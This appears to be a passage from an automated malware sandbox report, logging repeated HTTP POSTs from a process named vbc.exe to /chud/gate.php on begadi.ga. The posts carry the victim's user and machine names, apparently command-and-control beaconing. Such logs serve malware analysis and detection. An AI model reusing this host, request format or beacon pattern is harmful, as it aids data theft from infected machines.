Dec 21, 2020 08:34:33.942080975 CET	781	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.22	49289	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:34.328589916 CET	782	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:34.389806986 CET	782	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:34.518872976 CET	783	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.22	49290	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:35.213001013 CET	784	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:35.276470900 CET	784	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:35.405752897 CET	784	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.22	49291	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:35.946670055 CET	785	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:36.005922079 CET	785	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:36.130556107 CET	785	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.22	49292	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:36.385445118 CET	786	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:36.444144011 CET	787	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:36.570178032 CET	787	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.22	49293	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:36.835882902 CET	788	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:36.894432068 CET	788	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:37.022111893 CET	788	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.22	49294	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:37.281356096 CET	789	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:37.345427036 CET	789	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:37.475840092 CET	790	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.22	49295	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:37.759174109 CET	790	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:37.818434954 CET	791	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:37.948972940 CET	791	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.22	49296	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:38.210194111 CET	792	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:38.269148111 CET	792	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:38.398350000 CET	792	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.22	49180	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:38.365580082 CET	632	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:38.422821999 CET	633	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:38.546295881 CET	633	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.22	49297	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:38.671751022 CET	793	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:38.730829954 CET	793	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:38.856240988 CET	794	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.22	49298	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:39.105133057 CET	795	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:39.164755106 CET	795	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:39.286987066 CET	795	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.22	49299	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:39.556085110 CET	796	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:39.619220972 CET	796	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:39.755601883 CET	796	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.22	49300	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:40.016911030 CET	797	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:40.075862885 CET	797	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:40.205009937 CET	798	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.22	49301	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:40.489841938 CET	799	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:40.555931091 CET	799	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:40.690089941 CET	799	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.22	49302	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:40.965176105 CET	800	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:41.024310112 CET	800	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:41.148494959 CET	801	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.22	49303	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:41.423696995 CET	801	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:41.488898039 CET	802	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:41.618469954 CET	802	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.22	49304	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:41.877856970 CET	803	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:41.937447071 CET	803	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:42.063981056 CET	803	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.22	49305	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:42.325851917 CET	804	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:42.388955116 CET	804	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:42.520302057 CET	805	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.22	49306	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:42.778146029 CET	805	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:42.834728003 CET	806	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:42.961060047 CET	806	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.22	49181	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:38.845704079 CET	634	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:38.907458067 CET	634	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:39.040893078 CET	634	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.22	49307	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:43.216171026 CET	807	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:43.274961948 CET	807	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:43.400024891 CET	807	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.22	49308	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:43.656409979 CET	808	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
